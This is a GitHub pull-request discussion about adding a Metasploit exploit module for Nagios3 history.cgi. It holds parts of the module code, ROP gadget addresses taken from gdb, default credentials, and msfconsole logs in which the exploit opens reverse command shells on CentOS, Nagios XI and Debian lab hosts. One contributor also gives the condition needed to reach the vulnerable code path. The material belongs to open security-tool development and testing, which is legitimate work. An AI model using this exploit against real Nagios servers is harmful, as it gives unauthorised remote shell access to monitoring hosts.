New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Nagios3 history.cgi exploit #1314
Conversation
It overlaps with #1313 I'll see what can be done. |
require 'rex' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = ExcellentRanking |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Prolly it doesn't fit the requirements for ExcelentRanking. We can redefine it once finished. Just pointing atm.
msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.156 RHOST => 192.168.1.156 msf exploit(nagios3_history_cgi) > set URI /nagios/cgi-bin/history.cgi URI => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > set USER nagiosadmin USER => nagiosadmin msf exploit(nagios3_history_cgi) > set PASS nagiosadmin PASS => nagiosadmin msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(nagios3_history_cgi) > set target 1 target => 1 msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Selected Target: CentOS (nagios-3.4.3-1.el6.i686.rpm) [*] Sending request to http://192.168.1.156:80/nagios/cgi-bin/history.cgi [*] Unknown response [*] 200 msf exploit(nagios3_history_cgi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Target 1 CentOS (nagios-3.4.3-1.el6.i686.rpm) 2 Debian (nagios3_3.0.6-4~lenny2_i386.deb)
[root@localhost ~]# uname -a Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux [root@localhost ~]# cat /etc/redhat-release CentOS release 6.3 (Final) [root@localhost ~]# rpm -qa | grep nagios nagios-3.4.3-1.el6.i686 Testing the debian target and digging into it, will update asap |
register_options( | ||
[ | ||
OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), | ||
OptString.new('USER', [false, "The username to authenticate with", "guest"]), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
In my first installation of nagios for centos, from the epel repo, there is a default nagiosadmin / nagiosadmin user, but not guest / guest, maybe could be a good idea to switch to nagiosadmin / nagiosadmin by default. Not sure if guest / guest are common credentials in other default packages.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Working on it.
It's working neither on Debian 5 / nagios3_3.0.6-4~lenny2_i386.deb msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.155 RHOST => 192.168.1.155 msf exploit(nagios3_history_cgi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Target 1 CentOS (nagios-3.4.3-1.el6.i686.rpm) 2 Debian (nagios3_3.0.6-4~lenny2_i386.deb) msf exploit(nagios3_history_cgi) > set target 2 target => 2 msf exploit(nagios3_history_cgi) > set PASS nagiosadmin PASS => nagiosadmin msf exploit(nagios3_history_cgi) > set USER nagiosadmin USER => nagiosadmin msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Selected Target: Debian (nagios3_3.0.6-4~lenny2_i386.deb) [*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi [*] Unknown response
nagios:~# uname -a Linux nagios 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux nagios:~# cat /etc/debian_version 5.0.10 nagios:~# dpkg -l | grep nagios3 ii nagios3 3.0.6-4~lenny2 A host/service/network monitoring and management system |
(gdb) x/2i 0x08048fe4 0x8048fe4 : pop %ebp 0x8048fe5 : ret (gdb) x/i 0x08048c7c 0x8048c7c : jmp *0x8071120
(gdb) x/2i 0x08048f04 0x8048f04 <__snprintf_chk@plt+12>: mov 0xfffffffc,%al 0x8048f09 : and $0x807d1c0,%eax (gdb) x/i 0x08048bb0 0x8048bb0: call 0x80c9385 (gdb) x/i 0x08048e70 0x8048e70 : add %eax,(%eax) (gdb) |
Wrong history.cgi . There was a NagiosXI installation in the same box. Let me to get the correct addresses for it. |
If Nagios XI uses also a vulnerable history.cgi and you make it work, feel free to add is as new target, more targets, more interesting exploit :) Please only tested and confirmed targets! :) |
@jvazquez-r7 this exploit works for me on debian I guess you have your nagios.log almost empty (or rotated). To reach the vulnerable code path you need to have at least a notification (or a alert I don't know exactly) in your Try to kill apache for some minutes and then restart it... (localhost/http is monitored by default) msf exploit(nagioscgi) > exploit [] Started reverse handler on 10.199.1.2:4444 meterpreter > |
@danielemartini You're right. We need at least one alert in order to exploit the vulnerability. |
Better :) I'm going to proceed with final test, cleanup by myself, credit both you and merge! Thanks very much @jselvi and @danielemartini for an awesome contribution! Great work! msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158 rhost => 192.168.1.158 msf exploit(nagios3_history_cgi) > set TARGETURI /nagios/cgi-bin/history.cgi TARGETURI => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > reload [*] Reloading module... msf exploit(nagios3_history_cgi) > check [*] Checking banner and version... [-] Please specify correct values for USER and PASS [-] No matching target [*] Cannot reliably check exploitability. msf exploit(nagios3_history_cgi) > set pass admin1234 pass => admin1234 msf exploit(nagios3_history_cgi) > check [*] Checking banner and version... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [+] The target is vulnerable. msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x) [*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi [*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.158:44234) at 2013-01-16 10:24:46 +0100 id; uid=48(apache) gid=48(apache) groups=48(apache),500(nagios),501(nagcmd) ^C Abort session 2? [y/N] y [*] 192.168.1.158 - Command shell session 2 closed. Reason: User exit |
After some cleanup exploit working on both centos (nagios xi applicance) and debian, merging! msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.9 (Debian) [*] Nagios version detected: 3.0.6 [*] Selected Target: Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb) [*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi [*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.155:34974) at 2013-01-16 11:50:56 +0100 ^C[-] Exploit failed: Interrupt ^C Abort session 3? [y/N] y [*] 192.168.1.155 - Command shell session 3 closed. Reason: User exit msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158 rhost => 192.168.1.158 msf exploit(nagios3_history_cgi) > set pass admin1234 pass => admin1234 msf exploit(nagios3_history_cgi) > set targeturi /nagios/cgi-bin/history.cgi targeturi => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x) [*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi [*] Command shell session 4 opened (192.168.1.128:4444 -> 192.168.1.158:46001) at 2013-01-16 11:51:31 +0100 ^C[-] Exploit failed: Interrupt ^C Abort session 4? [y/N] y [*] 192.168.1.158 - Command shell session 4 closed. Reason: User exit |
Nagios3 history.cgi exploit. Based on a blasty's working exploit (http://pastebin.com/FJUNyTaj) and added CentOS target.